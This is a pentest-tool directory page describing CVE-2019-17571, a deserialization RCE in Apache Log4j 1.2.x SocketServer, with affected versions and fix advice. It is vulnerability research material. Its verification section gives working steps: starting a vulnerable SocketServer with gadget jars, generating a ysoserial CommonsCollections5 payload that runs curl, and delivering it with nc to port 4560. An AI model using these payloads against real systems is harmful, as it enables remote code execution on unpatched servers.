Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-17571 — Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 | Kitploit
Tools/GitHubGitHub/shadow-horse/cve-2019-17571
Vulnerability AnalysisCode AnalysisExploitationPenetration TestingRemote Access Tool
GitHubshadow-horse/cve-2019-17571

CVE-2019-17571

Apache Log4j 1.2.X存在反序列化远程代码执行漏洞

View Repository
78566 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-17571 / Apache Log4j 1.2.X Deserialization Remote Code Execution Vulnerability

Vulnerability warning reference link: https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ

1. Vulnerability Description

Apache Log4j is a Java-based open-source logging tool developed by the Apache Software Foundation. A deserialization remote code execution vulnerability exists in Apache Log4j 1.2.X series. Attackers can exploit this vulnerability to execute arbitrary malicious commands. Log4j 1.2.X includes a SocketServer class that is vulnerable to deserialization of untrusted data. When listening to untrusted network traffic containing log data, this class can be exploited to remotely execute arbitrary code when combined with deserialization gadgets. The impact includes the latest version.

2. Hazard Level

High

Affected versions 1.2.4 <= Apache Log4j <= 1.2.17 (latest)

Fix recommendations

  1. Upgrade to the latest version of Apache Log4j 2 series
  2. Do not expose the socket port opened by this class to the internet

3. Vulnerability Verification

As early as Apache Log4j 2.8.1, a deserialization remote code execution vulnerability (CVE-2017-5645) existed, triggered via the class org.apache.logging.log4j.core.net.server.TcpSocketServer. In Apache Log4j 1.2.X, the vulnerable class changed to org.apache.log4j.net.SocketServer

1. Start the vulnerable environment

Through online research, it was found that starting the log4j 1.X SocketServer is done via a java command, not through Java code. (If there are other methods, please let me know.)

Similarly, you need to download the affected jar package as well as a jar package that allows code execution, and set them in the environment variable (the following is for Windows environment). Start the service, passing 3 parameters: a port, the log4j configuration file, and the lcf directory:

java -cp log4j-1.2.17.jar;c3p0-0.9.5.2.jar;mchange-commons-java-0.2.11.jar;commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 log4jserver.properties ./    

java -cp log4j-1.2.17.jar:../commons-collections/commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 config/log4jserver.properties ./

2. Exploit using log4j2 RCE POC

java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin  

3. Send malicious socket with nc

nc 127.0.0.1 4560 < log4j.curl.bin

Download related jars: https://github.com/shadow-horse/Vulenvironment/libs

Download Tool